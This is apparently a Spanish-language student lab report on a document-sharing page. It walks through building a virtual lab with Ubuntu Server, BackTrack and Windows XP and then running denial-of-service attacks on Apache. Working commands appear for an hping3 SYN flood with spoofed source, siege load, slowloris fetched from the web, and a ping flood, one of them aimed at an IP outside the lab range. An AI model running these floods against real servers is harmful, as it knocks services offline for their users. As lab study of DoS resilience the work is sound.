Upload
jorge-andres-moreno-jaimes
View
111
Download
1
Embed Size (px)
DESCRIPTION
Este documento describe como realizar ataques a un servidor http Apache, este documento es solo de caracter educativo.Los ataques se realizan desde diferente maquinas con diferentes S.O:WindowsUbuntu DesktopBackTrackTambién muestra como montar un servidor apache con Ubuntu Server, y como instalar el SO BackTrack.Otro punto es el crear una red interna entre maquinas virtuales, para poder realizar el ataque
Citation preview
ContenidoComo instalar Ubuntu Server:............................................................................................................2
Creacion de una maquina virtual ubuntu 11.10 server..................................................................2
EMPEZAMOS LA INSTALACION DE UBUNTU SERVER 11.10............................................................6
Como instalar BackTrack..................................................................................................................20
Creando la Unidad Virtual............................................................................................................20
Colocando la ISO de backtrack en la Maquina Virtual..................................................................24
Instalar Backtrack.........................................................................................................................25
Como inicia BackTrack......................................................................................................................30
Creación de la Red:..........................................................................................................................32
Adición de tarjetas de red a una Maquina:..................................................................................33
Configuración de una tarjeta de red en Backtrack.......................................................................34
Configuración de una tarjeta de red en Ubuntu Server................................................................35
Configuración de una tarjeta de red en Clientes..........................................................................36
Atacar al Servidor #1:.......................................................................................................................38
Desde Backtrack...........................................................................................................................38
Desde Ubuntu:.............................................................................................................................39
Ataque al servidor #2:......................................................................................................................41
Desde Backtrack...........................................................................................................................41
Ataque al Servidor #3:......................................................................................................................43
Ataque al servidor #4:......................................................................................................................44
Pruebas:...........................................................................................................................................45
Antes del Ataque:.........................................................................................................................45
Durante el Ataque:.......................................................................................................................46
Conclusiones....................................................................................................................................48
Bibliografía.......................................................................................................................................49
Como instalar Ubuntu Server:
Creacion de una maquina virtual ubuntu 11.10 server
Selección del tipo y versión Linux y Ubuntu
Seleccionamos la cantidadde disco duro a reservar dinamicamente
Seleccionamos el archivo .iso de Ubuntu server
EMPEZAMOS LA INSTALACION DE UBUNTU SERVER 11.10Seleccionamos el idioma con el cual queremos nuestro S.O
Seleccionamos la opción instalar
Seleccionamos el pais donde nos encontramos en este caso colombia y enter
Esta opcion es para detectar la configuracion del teclado le damos que si y enter
Aca nos pide que presionemos las teclas siguiente + y u
Luego nos muestra que selección de una lista de reconocimiento de teclados “latam” y le damos continuar
Aca nos pide el nombre de la maquina en este caso ejvega
En este paso seleccionamos guiado con eldisco completo y configuración LVW
Seleccionamos el disco en el cual se va montar el S.O, recuerden el espacio que seleccionamos en la creacion de la maquina virtual fue de 20GB por eso aca nos muestra ese disco, presionamos enter
Le damos que si deseamos guardar todo en el disco
Confirmamos que deseamos guardar todo en el disco
Proceso de instalacion ubuntu
Digitamos el nombre completo para el usuario, vamos a usar el mismo que venimos usando para evitar errores y le damos continuar
digitamos el nombre para la cuenta
Ya que fue una contraseña debil nos pide confirmar que deseamos dejar esacontraseña, le damos que si
Ubuntu server nos da la opcion de cifrar todoslos archivos que esten en nuestra carpeta personal asi ya estaran protegidos inicialmente
Para nuesta configuracion no es necesario tener un proxy asi que dejamos el campo vacio y le damos continuar
Seleccionamos laopcion de instalaractualizaciones de seguridad
Seleccionamos con la tecla Barra Espaciadora los servicios a instalar y luego enter para continuar
Seleccionamos que si deseamos instalar el cargador GRUB
Finalizamos la instalacion del servidor Ubuntu, dandole continuar.
INICIANDO EL SISTEMAOPERATIVO UBUNTU SERVER11.10
NOS PIDE UN LOGIN EN NUESTRO CASO ejvega y una contraseña 1234 y listo iniciamos la maquina
Escribimos los comandos que deseemos para controlar y configurar el servidor
Como instalar BackTrack
Creando la Unidad VirtualCreamos una nueva unidad en VirtualBox, para eso le damos clic en nuevo y le colocamos un nombre cualquiera, demás escogemos como sistema operativo Linux y versión Ubuntu de 64 bit
De memoria RAM le damos 1 GB (1024 Mb)
En la sección de disco virtual escogemos “Crear disco virtual nuevo” y nos fijamos que este seleccionada la opción de “Disco duro de arranque”
Para la creación del nuevo disco, escogemos VDI
Para el disco reciente creado escogemos “Reservado Dinámicamente”, para ahorra un poco de disco duro
Colocamos un nombre cualquiera, y escogemos la cantidad de GB que tendrá el disco duro, en nuestro caso escogimos 8 GB. (Corrección, al momento de instalar el SO nos sugiere por lo menos 12 GB, así que sugiero aumentar la capacidad a 15 GB, por si vas a descargar alguna otra cosa )
Luego nos aparecerá una ventana con los detalles del disco, le damos clic en “Crear”
Otra vez crear, esta vez la información que se muestra es de la maquina virtual
Colocando la ISO de Backtrack en la Maquina VirtualEscogemos la maquina a la cual deseamos colocarle la imagen ISO (en este caso BT) y damos clic en configuración.
Damos clic en “Almacenamiento” y luego en la unidad de cd con un “+” y luego escogemos “Agregar dispositivo CD/DVD”
Luego “Seleccionar disco”
Y buscamos nuestro ISO con Backtrack x64 y damos clic en Aceptar y luego en Aceptar en las Configuraciones.
Instalar BacktrackIniciamos la maquina virtual y esperamos unos minutos
Hasta que nos aparece esto
Escogemos la primera opción y damos “Enter” y esperamos que se inicie el Sistema Operativo, apenas lo haga, nos aparecerá algo como esto:
Una vez aparece la pantalla, digitamos la palabra “startx” y damos Enter, donde nos llevara a
Tras habernos situados en esta pantalla, damos doble clic en “Install BackTrack”
Escojamos el idioma deseado y damos clic en Siguiente y esperamos a que se configure el reloj, tras lo cual nos aparecerá la región donde nos encontramos, si todo esta bien damos cli en Adelante
En estos momentos esta la configuración del teclado de nuestro sistema operativo, por lo personal les recomiendo que den clic en la opción “Deducir..” para que les reconozca bien su teclado, el cual pueden probar en la zona inferior. Luego de probar, dar clic en Adelante
En la nueva ventana, escanea el disco duro para buscar otros Sistemas operativos, como no encuentra nos sugiere borrar el disco completamente y usarlo, la cual nosotros también deseamos, la seleccionamos y damos clic en Adelante
Como inicia BackTrackTras el paso de instalación, si todo va bien iniciamos la maquina virtual y esperamos a que cargue, tras lo cual nos pedirá un usuario, digitamos “root” y en la sección de password digitamos “toor”
Tras lo cual si hemos digitado bien nos saldrá un mensaje como este:
En el cual digitaremos “startx”, para iniciar la interfaz grafica.
Creación de la Red:
La red consistirá en 3 maquina virtuales las cuales juegan 3 roles:
Servidor de Paginas Web Atacante Cliente
Para poder hacer esto debemos añadir una tarjeta de red esta a cada maquina virtual, es decir una tarjeta de red para la maquina virtual que contenga el servidor, una a la que contenga el atacante y una para cada una que tenga un cliente
Adición de tarjetas de red a una Maquina:Primero que todo debemos apagar nuestra maquina virtual, escogemos la que deseamos agregar la tarjeta y nos vamos a configuraciones, luego a Red y para finalizar clic en la pestaña “Adaptador 2”.
Tras esto, seleccionamos la casilla “Habilitar adaptador de red” y escogemos Red Interna” y dejamos lo demás como están, para luego dar clic en aceptar.
Configuración de una tarjeta de red en BacktrackIniciamos Backtrack normalmente e iniciamos sesión. Tras el paso anterior, abrimos un terminal y digitamos el comando “ifconfig”, a lo cual podremos ver una información como la siguiente:
Podremos notar que la tarjeta eth1 no tiene asignada una dirección, y según nuestra grafica de la red, el atacante debe tener la dirección “192.168.1.3” para lo cual digitamos “ Ifconfig eth1 192.168.1.3 netmask 255.255.255.0”, en donde cambiaremos eth1 por el nombre que nos salga y oprimimos Enter. Para verificar nuestra configuración tipiamos nuevamente ifconfig y se deberá ver reflejada
Configuración de una tarjeta de red en Ubuntu ServerIniciamos el servidor normalmente e iniciamos sesión. Tras el paso anterior, digitamos el comando “ifconfig”, a lo cual podremos ver una información como la siguiente:
Podremos notar que la tarjeta eth1 no tiene asignada una dirección, y según nuestra grafica de la red, el servidor debe tener la dirección “192.168.1.2” para lo cual digitamos “ Ifconfig eth1 192.168.1.2 netmask 255.255.255.0”, en donde cambiaremos eth1 por el nombre que nos salga y oprimimos Enter. Para verificar nuestra configuración tipiamos nuevamente ifconfig y se deberá ver reflejada
Configuración de una tarjeta de red en Clientes.
En estas pruebas se usaran cliente que tenga el sistema operativo Windows Xp, aunque pueden tener cualquier sistema operativo (Windows o Linux, o cualquier otro).
Tras iniciar el sistema operativo damos clic en Inicio (1), luego en Panel de Control (2), a continuación en Conexiones de red (3) y por ultimo escogemos la nuestra conexión de área local (4), en nuestro caso será la conexión de área local 2 .
Damos clic derecho sobre dicha conexión (1), luego en propiedades (2) seguidamente escogemos “Protocolo TCP/IP”(3) y finalmente en propiedades (4).
Tras eso nos aparecerá una pantalla donde nos pide los detalles de la red, en donde la dirección ip escogeremos alguna entre 192.168.1.4 y 192.168.1.255
Atacar al Servidor #1:
Desde BacktrackPara este paso, debemos haber instalado Backtrack sin ningún problema y haber agregado y configurado correctamente la tarjeta de red.
Para verificar nuestra conexión con el servidor de páginas web, abrimos el navegador Mozilla
Y en la dirección URL digitamos 192.168.1.2 y nos deberá salir un mensaje de bienvenida de apache o una pagina cualquiera
Ahora abrimos una terminal y tipiamos el siguiente comando "hping3 -a 192.168.0.221 -S -p 80 --flood 192.168.1.2", de donde
hping3, ejecución de programa... -a 192.169.0.221, asignación de IP falsa... -S, peticiones con SYN FLAG... -p 80, puerto 80 (ataque dDos)... --flood si lo remplazas por --faster atacara con un ancho de banda superior a unos 400
Kbps --flood es mas destructivo 192.168.1.2 al final el IP de la victima...
(nik0n)
Desde Ubuntu:Para este caso necesitamos una maquina con sistema operativo Ubuntu y una tarjeta de red que este configurada para la red de pruebas, y otra con conexión a internet.
Primero iniciamos el sistema operativo y abrimos una terminal, donde digitaremos los siguiente
Ahora si intentamos ingresa desde algún cliente, nos saldrá lo siguiente:
Ahora esperaremos a que se descarguen los paquetes necesarios, si no pide actualizar primero digitamos “sudo apt-get update” y luego continuamos con el comando anterior
Si todo está bien ahora digitaremos el siguiente comando: “siege -c350 -t30M -d1 192.168.1.2”
Siege, programa iniciado -c350, peticiones por segundo -t30M, duración del ataque -d1, multiplicación de las peticiones...
Ataque al servidor #2:
Desde BacktrackPara este ataque se necesita únicamente una maquina como atacante, y se usaran unos script que hay en internet
Iniciamos nuestro Backtrack y e el escritprio creamos una carpeta llemada “ataque” ejecutamos una terminal y accedemos a esa carpeta, nos vamos a la pagina http://pastebin.com/gszAqZtJ y copiamos las 152 lineas, luego en el terminal ejecutamos el comando “nano lbd.sh”
Y pegamos (con CTRL + SHIFT +V) el texto, luego guardamos (oprimimos CTRL +X, luego Y y luego ENTER)
Ahora nos dirijos a la pagina http://ha.ckers.org/slowloris/slowloris.pl y copiamos todo el texto, para luego en al consola digitar nano slowloris.pl y enter. Abierto el editor pegamos el archivo y guardamos (como en el paso anterior).
Ahora le damos permisos a los archivos en esa carpeta, para eso ejecutamos “chmod 775 *”
Ahora ejecutamos el archivo lbd con la ip “./lbd.sh 192.168.1.2”
Y por ultimo ejecutamos “./slowloris.pl –dns 192.168.1.2 –port 80 –num 7000 –tcptp 5 –httpready”
(Hacker)
Ataque al Servidor #3:Para este ataque se utilizara una sencilla aplicación para Windows donde únicamente requeriremos la Ip del servidor y el puerto.
Para ello ejecutamos la aplicación rDos by Rixer y nos preguntara la ip
Colocamos la 192.168.1.2 e inmediatamente después nos pedirá el puerto, al cual colocaremos 80:
Y el automáticamente empezara enviar peticiones.
(melihnio100)
Ataque al servidor #4:Este ataque se realizar es por consola de comandos, y por ende solamente funciona en sistema operativo Windows.
Abrimos una consola (Windows +r y luego cmd)
En la consola digitamos el siguiente comando: “ping 112.158.10.2 -l 65500 -n 10000000 -w 0.00001”, donde:
n representa el numero de intentos w es el tiempo de espera tras un ataque de ping l es el tamaño del paquete
(Prasson)
Pruebas:Para las pruebas se implementara 6 maquinas virtuales
Nombre Sistema Operativo Memoria Ram Dirección IPServidor Ubuntu Server 12.04 256 MB 192.168.1.2Backtrack Backtrack 5 rc3 1024 MB 192.168.1.3Win XP Cliente 1 Windows XP 300 MB 192.168.1.20Win XP Cliente 2 Windows XP 300 MB 192.168.1.21Ubuntu Ubuntu 12.04 1024 192.168.1.40Ubuntu Ubuntu 12.04 1024 192.168.1.41
Antes del Ataque:Antes de realizar algún ataque se verificara el estado del servidor tipeando el siguiente comando: “vmstat”
Durante el Ataque:Para este paso, en la siguiente tabla se especificaran los ataques que realizara cada maquina al servidor:
Maquina Ataque #1 Ataque #2 Ataque #3 Ataque #4Backtrack x xWin XP Cliente 1 x xWin XP Cliente 2 x xUbuntu xUbuntu x
Estado del Servidor #1:
Estado del Servidor #2:
Conclusiones
1 2 3 4 5 6 7 8 9 10 11 120
10000
20000
30000
40000
50000
60000
70000
80000
Ciclos Memoria Libre
Ciclos- Cada ciclo representa 5 seg
Canti
dad
de M
emor
ia S
wap
Libr
e
En la grafica se puede notar como la memoria del servidor disminuye drásticamente (entre el ciclo 0 y 2), que es justamente cuando se lanzan todos los ataque simultáneamente, pero luego podemos notar que el servidor se empieza a estabilizar (aproximadamente 3900) eso gracias a que el empieza a rechazar las conexiones de los atacantes.
Para este caso no se pudo negar el servicio (el de apache en este caso), pero quedara para futuras investigaciones el realizar los mismo ataques con un mayor numero de maquinas para poder determinar el desempeño del servidor.
BibliografíaHacker, G. (s.f.). Obtenido de http://www.youtube.com/watch?v=fpT1GndrKdI
melihnio100. (s.f.). Obtenido de http://www.youtube.com/watch?v=wIt7W0dvSdg
nik0n. (s.f.). Obtenido de http://foro.elhacker.net/gnulinux/denegacion_de_servicio_con_backtrack_5_y_ubuntu_1011-t353455.0.html
Prasson. (s.f.). Obtenido de http://prasoon-nigam.blogspot.com/2012/01/diffrent-ways-to-dos-attack.html